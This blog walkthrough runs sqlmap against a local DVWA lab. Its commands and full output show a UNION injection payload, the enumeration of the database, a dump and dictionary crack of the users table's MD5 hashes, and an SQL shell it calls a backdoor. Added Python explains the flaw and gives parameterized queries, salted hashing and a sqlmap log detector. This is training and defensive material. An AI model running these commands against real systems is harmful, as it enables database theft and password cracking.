
Monday, 05 March 2012

Advanced Web Hacking

1. Open Mantra.
2. Add the URL localhost:8080 and open DVWA with the security level set to medium.
3. Open Burp Suite to dump the traffic from Mantra.
4. Open a terminal and type:

root@bt:~# cd /pentest/database/sqlmap/


5. Check the databases using sqlmap

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit" --cookie "security=medium; PHPSESSID=2p9kki5hbjsvupbavnl95jqpl7" --dbs

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 21:59:30

[21:59:32] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[21:59:32] [INFO] resuming injection data from session file
[21:59:32] [INFO] resuming back-end DBMS 'mysql 5' from session file
[21:59:32] [INFO] testing connection to the target url
[21:59:32] [INFO] heuristics detected web page charset 'ascii'
[21:59:32] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=' UNION ALL SELECT CONCAT(CHAR(58,105,102,116,58),CHAR(66,105,66,104,70,122,65,113,102,109),CHAR(58,105,118,106,58)), NULL# &Submit=Submit
---

[21:59:32] [INFO] manual usage of GET payloads requires url encoding
[21:59:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[21:59:32] [INFO] fetching database names
[21:59:32] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': information_schema, dvwa, fbip, mysql
available databases [4]:
[*] dvwa
[*] fbip
[*] information_schema
[*] mysql

[21:59:32] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 21:59:32
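The injection point sqlmap reports above works because the application pastes the `id` value straight into the SQL text, so the `'` closes the intended string literal and the `UNION ALL SELECT` that follows adds a row of the attacker's choosing to the result. The Python below is an added example and is not code from the post, from DVWA or from sqlmap: it builds a constructed in-memory SQLite table in the shape of `dvwa.users` (invented rows), rewrites the page's payload in SQLite syntax (`||` for `CONCAT()`, `-- ` for MySQL's `#`), and runs it against a string-formatted query and against a parameterized one.

```python
import sqlite3

def build_db():
    """Constructed in-memory table in the shape of dvwa.users (rows are invented)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, "
        "user TEXT, password TEXT)"
    )
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
        [(1, "Alice", "Example", "alice", "hash-a"),
         (2, "Bob", "Example", "bob", "hash-b")],
    )
    return con

# The page's sqlmap payload, adapted to SQLite syntax: || instead of CONCAT()
# and "-- " instead of MySQL's "#" comment. The CHAR() byte values are the
# ones sqlmap used above; they spell a marker string the tool searches for.
MARKER_PAYLOAD = (
    "' UNION ALL SELECT char(58,105,102,116,58)"
    "||char(66,105,66,104,70,122,65,113,102,109)"
    "||char(58,105,118,106,58), NULL-- "
)

def lookup_vulnerable(con, user_id):
    """Query built by string formatting: the input becomes part of the SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return con.execute(sql).fetchall()

def lookup_parameterized(con, user_id):
    """Same query with a bound parameter: the input is only ever a value."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(sql, (user_id,)).fetchall()

if __name__ == "__main__":
    con = build_db()
    print(lookup_vulnerable(con, MARKER_PAYLOAD))      # [(':ift:BiBhFzAqfm:ivj:', None)]
    print(lookup_parameterized(con, MARKER_PAYLOAD))  # []
```

The vulnerable lookup returns the marker row that sqlmap looks for in the response, which is exactly how it confirmed the `UNION query (NULL) - 1 to 10 columns` finding; the parameterized lookup returns nothing, because the whole payload is compared against `user_id` as one opaque string. Input escaping alone (as DVWA's medium level attempts) only narrows the syntax an attacker can use; binding parameters removes the grammar problem entirely.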

6. Check the tables

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit" --cookie "security=medium; PHPSESSID=2p9kki5hbjsvupbavnl95jqpl7" -D dvwa --tables

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:12:39

[22:12:40] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[22:12:40] [INFO] resuming injection data from session file
[22:12:40] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:12:40] [INFO] testing connection to the target url
[22:12:40] [INFO] heuristics detected web page charset 'ascii'
[22:12:40] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=' UNION ALL SELECT CONCAT(CHAR(58,105,102,116,58),CHAR(66,105,66,104,70,122,65,113,102,109),CHAR(58,105,118,106,58)), NULL# &Submit=Submit
---

[22:12:40] [INFO] manual usage of GET payloads requires url encoding
[22:12:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[22:12:40] [INFO] fetching tables for database: dvwa
[22:12:40] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': dvwa, guestbook, dvwa, users
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[22:12:41] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 22:12:41


7. Check the columns in users

 root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit" --cookie "security=medium; PHPSESSID=2p9kki5hbjsvupbavnl95jqpl7" -D dvwa -T users --column

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:20:07

[22:20:07] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[22:20:07] [INFO] resuming injection data from session file
[22:20:07] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:20:07] [INFO] testing connection to the target url
[22:20:07] [INFO] heuristics detected web page charset 'ascii'
[22:20:07] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=' UNION ALL SELECT CONCAT(CHAR(58,105,102,116,58),CHAR(66,105,66,104,70,122,65,113,102,109),CHAR(58,105,118,106,58)), NULL# &Submit=Submit
---

[22:20:07] [INFO] manual usage of GET payloads requires url encoding
[22:20:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[22:20:07] [INFO] fetching columns for table 'users' on database 'dvwa'
[22:20:07] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': user_id, int(6), first_name, varchar(15), last_name, varchar(15), user, varchar(15), password, varchar(32), avatar, varchar(70)
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user       | varchar(15) |
| user_id    | int(6)      |
+------------+-------------+

[22:20:07] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 22:20:07


8. Check the user names and passwords

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit" --cookie "security=medium; PHPSESSID=2p9kki5hbjsvupbavnl95jqpl7" -D dvwa -T users -C password --dump

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:22:44

[22:22:44] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[22:22:44] [INFO] resuming injection data from session file
[22:22:44] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:22:44] [INFO] testing connection to the target url
[22:22:44] [INFO] heuristics detected web page charset 'ascii'
[22:22:44] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=' UNION ALL SELECT CONCAT(CHAR(58,105,102,116,58),CHAR(66,105,66,104,70,122,65,113,102,109),CHAR(58,105,118,106,58)), NULL# &Submit=Submit
---

[22:22:44] [INFO] manual usage of GET payloads requires url encoding
[22:22:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[22:22:50] [INFO] fetching columns LIKE 'password' for table 'users' on database 'dvwa'
[22:22:50] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': password, varchar(32)
[22:22:50] [INFO] fetching column(s) 'password' entries for table 'users' on database 'dvwa'
[22:22:50] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': 5f4dcc3b5aa765d61d8327deb882cf99, e99a18c428cb38d5f260853678922e03, 8d3533d75ae2c3966d7e0d4fcc69216b, 0d107d09f5bbe40cade3de5c71e9e9b7, 5f4dcc3b5aa765d61d8327deb882cf99
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[22:23:02] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[22:23:36] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[22:23:50] [INFO] starting dictionary attack (md5_generic_passwd)
[22:23:51] [INFO] found: 'abc123' for hash: 'e99a18c428cb38d5f260853678922e03'                                              
[22:23:51] [INFO] found: 'charley' for hash: '8d3533d75ae2c3966d7e0d4fcc69216b'                                             
[22:23:52] [INFO] found: 'letmein' for hash: '0d107d09f5bbe40cade3de5c71e9e9b7'                                             
[22:23:52] [INFO] found: 'password' for hash: '5f4dcc3b5aa765d61d8327deb882cf99'                                            
Database: dvwa                                                                                                              
Table: users
[4 entries]
+---------------------------------------------+
| password                                    |
+---------------------------------------------+
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| e99a18c428cb38d5f260853678922e03 (abc123)   |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------------------------------------------+

[22:23:52] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[22:23:52] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 22:23:52
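The dictionary step above finishes in about a second because the `password` column holds plain, unsalted MD5 digests: the same word always yields the same 32-hex-character value, so one wordlist pass answers every row at once, and the two users who share `5f4dcc3b5aa765d61d8327deb882cf99` are visibly the same password even before anything is cracked. The Python below is an added example, not code from the post, DVWA or sqlmap: it checks the four hashes the page dumped against the words sqlmap reported for them, flags duplicate digests in the dumped column, and shows a salted PBKDF2 storage format (a constructed record layout, `pbkdf2_sha256$iterations$salt$digest`, chosen for this example) under which identical passwords no longer share a stored value.

```python
import hashlib
import hmac
import os
import re

# Hashes exactly as dumped on the page, paired with the words sqlmap reported.
DUMPED = {
    "5f4dcc3b5aa765d61d8327deb882cf99": "password",
    "e99a18c428cb38d5f260853678922e03": "abc123",
    "8d3533d75ae2c3966d7e0d4fcc69216b": "charley",
    "0d107d09f5bbe40cade3de5c71e9e9b7": "letmein",
}

# The five values in the order sqlmap read them from the session file above.
DUMP_ORDER = [
    "5f4dcc3b5aa765d61d8327deb882cf99",
    "e99a18c428cb38d5f260853678922e03",
    "8d3533d75ae2c3966d7e0d4fcc69216b",
    "0d107d09f5bbe40cade3de5c71e9e9b7",
    "5f4dcc3b5aa765d61d8327deb882cf99",
]

RAW_MD5_RE = re.compile(r"^[0-9a-f]{32}$")

def looks_like_raw_md5(value):
    """Audit check: a bare 32-hex-digit value is the shape of an unsalted MD5."""
    return bool(RAW_MD5_RE.match(value))

def is_unsalted_md5_of(stored_hex, candidate):
    """Confirm that a stored value is the plain MD5 of a known-weak candidate."""
    digest = hashlib.md5(candidate.encode()).hexdigest()
    return hmac.compare_digest(digest, stored_hex)

def duplicate_hashes(values):
    """Stored values shared by more than one account: identical passwords leak."""
    return sorted({v for v in values if values.count(v) > 1})

def hash_password(password, salt=None, iterations=200_000):
    """Salted, iterated PBKDF2-HMAC-SHA256; the salt is random per record."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())

def verify_password(password, stored):
    """Recompute with the record's own salt and compare in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    for h, word in DUMPED.items():
        print(h, word, is_unsalted_md5_of(h, word))
    print("shared:", duplicate_hashes(DUMP_ORDER))
    print(hash_password("password"))
    print(hash_password("password"))  # differs from the line above
```

With the salted scheme, the two accounts that both use `password` get different stored records, and a wordlist has to be run per account at 200,000 iterations each instead of once for the whole table; `looks_like_raw_md5` is the kind of check to run over a password column when auditing an application that, like this DVWA build, predates proper password hashing.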


9. Creating a backdoor

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit" --cookie "security=medium; PHPSESSID=2p9kki5hbjsvupbavnl95jqpl7" --sql-shell

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool                                                     
    http://sqlmap.sourceforge.net
                                                                                                                                    
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.                                                                       

[*] starting at: 22:44:40                                                                                                           

[22:44:40] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[22:44:40] [INFO] resuming injection data from session file
[22:44:40] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:44:40] [INFO] testing connection to the target url
[22:44:41] [INFO] heuristics detected web page charset 'ascii'
[22:44:41] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests       
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=' UNION ALL SELECT CONCAT(CHAR(58,105,102,116,58),CHAR(66,105,66,104,70,122,65,113,102,109),CHAR(58,105,118,106,58)), NULL# &Submit=Submit
---

[22:44:41] [INFO] manual usage of GET payloads requires url encoding
[22:44:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[22:44:41] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> show databases;
do you want to retrieve the SQL statement output? [Y/n/a] y
[22:46:05] [INFO] fetching SQL SELECT statement query output: 'show databases;'
[22:46:05] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)
sql-shell>
[00:59:35] [ERROR] user aborted
sql-shell>
[1]+  Stopped                 ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit" --cookie "security=medium; PHPSESSID=2p9kki5hbjsvupbavnl95jqpl7" --sql-shell
root@bt:/pentest/database/sqlmap# mysql -h 192.168.56.1 -u root -p
Enter password:
ERROR 2003 (HY000): Can't connect to MySQL server on '192.168.56.1' (101)
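Seen from the defender's side, every sqlmap run above left the same fingerprint in the web server's access log: a GET to `/dvwa/vulnerabilities/sqli/` whose `id` value contains a lone quote, `UNION ... SELECT`, `CHAR(...)` sequences and a trailing comment marker, sent with sqlmap's default User-Agent. The Python below is an added example, not code from the post; the Apache combined-format log lines it scans are constructed for this example (the first mirrors the probe shown above, the last is the bare `id=%27` test), and the rules are heuristics rather than a complete signature, since a User-Agent is trivially changed and payloads can be encoded differently.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed Apache combined-format access log (not from the original post).
# Line 1 mirrors the sqlmap UNION probe shown above; lines 2-3 are benign;
# line 4 is the single-quote probe (id=%27) that starts a manual test.
SAMPLE_LOG = """\
127.0.0.1 - - [05/Mar/2012:21:59:32 +0700] "GET /dvwa/vulnerabilities/sqli/?id=%27%20UNION%20ALL%20SELECT%20CONCAT%28CHAR%2858%2C105%2C102%2C116%2C58%29%2CNULL%29%2C%20NULL%23&Submit=Submit HTTP/1.1" 200 4571 "-" "sqlmap/1.0-dev (http://sqlmap.sourceforge.net)"
127.0.0.1 - - [05/Mar/2012:21:58:10 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4370 "-" "Mozilla/5.0"
127.0.0.1 - - [05/Mar/2012:21:58:12 +0700] "GET /dvwa/index.php HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
127.0.0.1 - - [05/Mar/2012:22:01:03 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit HTTP/1.1" 200 1820 "-" "Mozilla/5.0"
"""

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Each rule is applied to the URL-decoded value of every query parameter.
RULES = [
    ("union-select", re.compile(r"\bUNION\b.{0,40}\bSELECT\b", re.I | re.S)),
    ("char-encoding", re.compile(r"\bCHAR\s*\(\s*\d+\s*(?:,\s*\d+\s*)+\)", re.I)),
    ("comment-tail", re.compile(r"(?:#|--\s|/\*)\s*$")),
]

def analyze_request(target, user_agent):
    """Return the list of rule names that fire for one request line."""
    findings = []
    if "sqlmap" in user_agent.lower():
        findings.append("scanner-user-agent")
    for pair in urlsplit(target).query.split("&"):
        if "=" not in pair:
            continue
        name, raw = pair.split("=", 1)
        value = unquote_plus(raw)
        for rule, pattern in RULES:
            if pattern.search(value):
                findings.append(f"{rule}:{name}")
        # an odd number of quotes is the classic syntax-breaking probe
        if value.count("'") % 2 == 1:
            findings.append(f"odd-quote:{name}")
    return findings

def scan_log(text):
    """Parse each line and keep only requests with at least one finding."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyze_request(m["target"], m["ua"])
        if findings:
            hits.append({"ip": m["ip"], "time": m["ts"],
                         "target": m["target"], "findings": findings})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["ip"], ", ".join(hit["findings"]))
```

The first line fires on every rule at once, which is what a sqlmap session looks like in practice; the single `odd-quote:id` hit on the last line is the low-severity precursor worth correlating with the application's own database error messages, since the `DBMS error found in the HTTP response body` warning that sqlmap prints above is the application telling the attacker, and the log reader, that the quote reached the SQL parser.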
